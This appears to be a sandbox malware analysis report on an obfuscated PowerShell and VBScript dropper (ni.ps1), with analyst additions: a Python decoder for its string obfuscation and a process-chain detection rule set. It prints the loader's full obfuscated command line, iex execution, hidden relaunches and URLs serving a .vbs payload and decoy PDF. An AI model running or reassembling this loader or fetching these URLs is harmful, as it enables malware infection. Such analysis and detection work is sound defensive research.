          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/90-maschere-per-saldatura
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/cerca
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/contattaci
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/il-mio-account
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/img/logo.jpg
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/ordine
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/sitemap
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/themes/PRS070158/css/megnor/custom.css
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/wh/List
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/wh/List%20of%20rzmhquirzmhd%20itzmhms%20and%20szmhrviczmhs.pdf
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.pineappletech.ae
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.pineappletech.ae/ov/wh.vbs
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.pinzmhapplzmhtzmhch.azmh/ov/wh.vbs
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown | Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown | Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown | Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown | HTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.5:49765 version: TLS 1.2

          System Summary

Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. 
DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. Col
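The wscript.exe -> powershell.exe command line above carries its own string decoder: `Psykopaterne` walks the literal from index 5 in steps of 6 and keeps one character per step, and `responsibly` passes each decoded string to `& ($Forgyldte)`. The following Python port is an added analyst example, not part of the Joe Sandbox report or of the sample. The literals it decodes are copied from the command line above; the only assumption is the one double space restored in the `$Advoker` literal, which is labelled in the code and is checked against the cmd.exe command line the report records further down.

```python
import re
from typing import Dict


def psykopaterne(s: str, start: int = 5, step: int = 6) -> str:
    """Python port of the sample's Psykopaterne() string decoder.

    The PowerShell original, visible in the command line above, is:

        $Diastem = $s.Length - 1
        for ($i = 5; $i -lt $Diastem; $i += 6) { $out += $s.Substring($i, 1) }

    so each literal is a run of 6-character chunks in which only the last
    character is real; the other five are filler taken from word lists.
    The final chunk never yields a character because the loop stops at
    Length - 1.
    """
    limit = len(s) - 1
    return "".join(s[i] for i in range(start, limit, step))


# Matches `$Name = Psykopaterne '<literal>'` assignments in a command line.
ASSIGN_RE = re.compile(r"\$(?P<var>\w+)\s*=\s*Psykopaterne\s+'(?P<lit>[^']*)'")


def decode_assignments(cmdline: str) -> Dict[str, str]:
    """Decode every Psykopaterne literal that is assigned to a variable."""
    return {m["var"]: psykopaterne(m["lit"]) for m in ASSIGN_RE.finditer(cmdline)}


# Literals copied from the command line in the report. None of them contains
# consecutive spaces, so the rendered HTML did not alter them.
FORGYLDTE = "ShoppiMeasueEtta,xpoo.a "
SYNDSBEKENDELSENS = " Insk>Strou "
HIR = "PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent "

# ASSUMPTION: a rendered report collapses runs of spaces, which shifts every
# later chunk boundary of a position-based encoding. The $Advoker literal
# carries one double space (after "Deta.") that the page shows as a single
# space; it is restored here. The check that the assumption is right is that
# the restored literal decodes to exactly the cmd.exe command line the report
# records for the powershell.exe -> cmd.exe process creation.
ADVOKER = (
    "EftereGr,ndc StrihSa,lioDeta.  Stad%RecidaGainspUlyksp Ud rd ilmna,glert"
    "Forhaa M,no%Renai\\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P"
    " Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr "
)

# Constructed excerpt of the command line (three of its assignments, verbatim).
SAMPLE_CMDLINE = (
    "$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';"
    "$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';"
    "$grydeskeers='Idrtsparkerne';"
)


if __name__ == "__main__":
    for name, lit in (("Forgyldte", FORGYLDTE), ("Syndsbekendelsens", SYNDSBEKENDELSENS),
                      ("Hir", HIR), ("Advoker", ADVOKER)):
        print(f"${name} = {psykopaterne(lit)!r}")
    print(decode_assignments(SAMPLE_CMDLINE))
```

`$Forgyldte` decodes to `iex`, so `responsibly` is `& iex <decoded string>` and every other literal is executed, not just decoded; `$Hir` decodes to `User-Agent` and `$Syndsbekendelsens` to `>`. The `$Orloven` literal (the one the report wraps across two lines) contains collapsed spaces as well, so decode it from the dropped `.vbs` or the raw `ni.ps1`, never from a rendered report.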
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 8022
Source: classification engine | Classification label: mal100.expl.evad.winPS1@11/13@6/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Desktop\List of Required items and services.pdf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrlxcjd2.qka.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: ni.ps1 | ReversingLabs: Detection: 28%
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. 
DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. Col
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ahorntr.Pib && echo t"
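The process chain recorded above (ni.ps1 run with `-ExecutionPolicy unrestricted`, a hidden `powershell.exe -win hidden =iex ...`, `wscript.exe` on `C:\Users\Public\eji.vbs`, a further `powershell.exe` with an 8022-byte obfuscated command line, then `cmd.exe`) is the detection surface of this sample. The following rule set is an added analyst example, not part of the Joe Sandbox report; it runs over constructed process-creation lines written in the `Source: <parent> | Process created: <child> <command line>` form used in this section. The rule names, the 4096-byte threshold, the folder list and the benign explorer.exe line are the example's own assumptions, and the 8022-byte command line is replaced by a same-length stand-in.

```python
import re
from typing import Dict, List

# Parses one process-creation line in the form used in this section:
#   Source: <parent image> | Process created: <child image> <command line>
LINE_RE = re.compile(
    r"^Source: (?P<parent>.+?) \| Process created: (?P<image>\S+) (?P<cmdline>.*)$"
)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# User-writable staging folders (assumed list); C:\Users\Public is the one this sample uses.
SUSPICIOUS_DIRS = ("\\users\\public\\", "\\appdata\\local\\temp\\", "\\programdata\\")
# Assumed threshold, well below the 8022-byte command line the report measured.
OVERSIZED_CMDLINE = 4096


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(line: str) -> List[str]:
    """Return the names of every rule a single process-creation line triggers."""
    m = LINE_RE.match(line)
    if not m:
        return []
    parent, image = _basename(m["parent"]), _basename(m["image"])
    cmd = m["cmdline"]
    low = cmd.lower()
    hits: List[str] = []
    if parent in SCRIPT_HOSTS and image == "powershell.exe":
        hits.append("script_host_spawns_powershell")
    if parent == "powershell.exe" and image in SCRIPT_HOSTS:
        hits.append("powershell_spawns_script_host")
    if image in SCRIPT_HOSTS and any(d in low for d in SUSPICIOUS_DIRS):
        hits.append("script_host_from_suspicious_folder")
    if image == "powershell.exe":
        if re.search(r"-(ex|ep|executionpolicy)\s+(unrestricted|bypass)", low):
            hits.append("powershell_insecure_executionpolicy")
        if re.search(r"-(w|win|windowstyle)\s+hidden", low):
            hits.append("powershell_hidden_window")
        if re.search(r"\biex\b|invoke-expression", low):
            hits.append("powershell_invoke_expression")
        if len(cmd) > OVERSIZED_CMDLINE:
            hits.append("powershell_oversized_commandline")
    return hits


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index -> triggered rules, for the lines that trigger anything."""
    result: Dict[int, List[str]] = {}
    for i, line in enumerate(lines):
        hits = evaluate(line)
        if hits:
            result[i] = hits
    return result


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSH = r"C:\Windows\System32\wscript.exe"

# Constructed sample: the report's chain with the 8022-byte obfuscated command
# line replaced by a same-length stand-in, plus one benign line that must not fire.
SAMPLE_LINES = [
    "Source: unknown | Process created: " + PS + ' "' + PS
    + '" -noLogo -ExecutionPolicy unrestricted -file "C:\\Users\\user\\Desktop\\ni.ps1"',
    "Source: " + PS + " | Process created: " + PS + ' "' + PS
    + "\" -win hidden =iex \"[Environment]::GetEnvironmentVariable('public') + '\\\\z1rpb4.vbs'\"",
    "Source: " + PS + " | Process created: " + WSH
    + ' "C:\\Windows\\System32\\WScript.exe" "C:\\Users\\Public\\eji.vbs"',
    "Source: " + WSH + " | Process created: " + PS + ' "' + PS
    + "\" \"cls;write '" + "A" * 8000 + "'\"",
    "Source: " + PS + " | Process created: C:\\Windows\\System32\\cmd.exe"
    + " \"C:\\Windows\\system32\\cmd.exe\" /c \"echo %appdata%\\Ahorntr.Pib && echo t\"",
    "Source: C:\\Windows\\explorer.exe | Process created: C:\\Windows\\System32\\notepad.exe"
    + " \"notepad.exe\" C:\\Users\\user\\notes.txt",
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LINES).items():
        print(idx, hits)
```

Each stage of the chain fires on its own, so a single missed event still leaves the parent-child pairs (`powershell.exe` -> `wscript.exe`, `wscript.exe` -> `powershell.exe`) and the oversized command line as independent signals; the cmd.exe `echo %appdata%\...` probe is deliberately left unflagged, since on its own it is indistinguishable from benign path resolution.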
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dlnashext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wpdshext.dll
